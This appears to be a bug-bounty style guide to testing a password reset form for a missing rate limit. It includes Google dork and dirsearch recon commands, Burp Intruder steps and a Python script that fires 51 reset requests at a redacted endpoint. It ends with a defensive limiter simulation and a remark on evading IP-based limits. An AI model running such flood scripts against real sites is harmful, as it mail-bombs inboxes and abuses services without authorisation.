Steps:
1. Search for potential endpoints: use Google dorks to identify password reset pages on the target. For example:
site:*.Redacted.com intitle:"Reset Password" | "Forget Password"
Endpoints can be found in other ways too, e.g. by fuzzing (the --max-rate flag keeps the scan slow enough not to trip or hide the very rate limit you are about to test):
dirsearch -u https://Redacted.com/ --max-rate=5 -w ~/ur_wordlist.txt
2. Capture the request with Burp Suite or OWASP ZAP.
Fill out the form that triggers the e-mail, using an address you own as the destination, for example free@Palestine.com.
Then send the request and inspect the response. It may already tell you whether a rate limit exists (a 429 status or a Retry-After header, for instance), but the absence of either does not prove that there is none.
3. Use Burp Suite (Intruder or Repeater) or OWASP ZAP to send more than 50 copies of that request, all to the e-mail address you own, in under 10 seconds. Then count the reset e-mails that actually arrive in your inbox: a 200 response on its own does not prove a mail was sent, so the inbox count is the evidence that no rate limit is in place.
I also wrote a small Python script that does the same thing in another way:
import time
import requests

url = "https://captest.Redacted.com/Account/RequestPassword"
headers = {
    "Host": "captest.Redacted.com",
    # Content-Length is deliberately not set here: requests computes it
    # from the encoded body, so a hard-coded value is redundant at best.
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
}
data = {
    "UserName": "free@Palestine.com",
}
# Send 51 requests (more than 50) back to back and time the burst, so the
# result can be compared against the "under 10 seconds" target.
start = time.time()
for i in range(51):
    response = requests.post(url, headers=headers, data=data, timeout=10)
    print(f"{i + 1}: status {response.status_code}, body length {len(response.content)}")
print(f"Sent 51 requests in {time.time() - start:.1f} s")
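To see the missing control next to its fix, here is an added Python simulation (written for this page; it is neither the author's script nor the target's code): a stand-in for the reset handler, run once with no throttling and once behind a sliding-window limiter keyed by e-mail address and by client IP. The handler name, the policy numbers (3 mails per address per hour, 10 requests per IP per 10 minutes), the client IP 203.0.113.7 and the e-mail address are assumptions, and nothing is sent over the network: the handler records the mails it would have sent so the flood can be measured.

```python
import time
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock        # injectable so a test can fast-forward time
        self._events = {}         # key -> deque of timestamps inside the window

    def allow(self, key):
        now = self.clock()
        q = self._events.setdefault(key, deque())
        while q and now - q[0] >= self.window:   # expire timestamps that left the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class ResetEndpoint:
    """Assumed stand-in for /Account/RequestPassword. Instead of mailing,
    it records every e-mail it would have sent so the flood can be counted."""

    def __init__(self, per_email=None, per_ip=None):
        self.per_email = per_email
        self.per_ip = per_ip
        self.sent = []

    def request_password(self, email, client_ip):
        if self.per_ip is not None and not self.per_ip.allow(client_ip):
            return 429            # per-IP limit: cheapest check, reject loudly
        if self.per_email is not None and not self.per_email.allow(email.lower()):
            # Throttled per address: answer exactly like a success so the
            # response does not reveal whether a mail went out.
            return 200
        self.sent.append(email)
        return 200


def flood(endpoint, email, client_ip, count=51):
    """Repeat the page's test against a handler: `count` back-to-back requests.
    Returns ({status code: how many}, number of e-mails actually sent)."""
    statuses = {}
    for _ in range(count):
        code = endpoint.request_password(email, client_ip)
        statuses[code] = statuses.get(code, 0) + 1
    return statuses, len(endpoint.sent)


def hardened_endpoint(clock=time.monotonic):
    """Assumed policy: 3 mails per address per hour, 10 requests per IP per 10 minutes."""
    return ResetEndpoint(
        per_email=SlidingWindowLimiter(limit=3, window=3600, clock=clock),
        per_ip=SlidingWindowLimiter(limit=10, window=600, clock=clock),
    )


if __name__ == "__main__":
    # Constructed inputs: the address from the page and a documentation IP.
    print("no limiter:  ", flood(ResetEndpoint(), "free@Palestine.com", "203.0.113.7"))
    print("with limiter:", flood(hardened_endpoint(), "free@Palestine.com", "203.0.113.7"))
```

Two things the simulation makes explicit. The throttled handler still answers 200 when the per-address limit kicks in, so in the real test the proof is the number of reset e-mails that land in the inbox you control, not the number of 200 responses. And a limit keyed only by IP is sidestepped by rotating source addresses, which is why the target address itself is also a key.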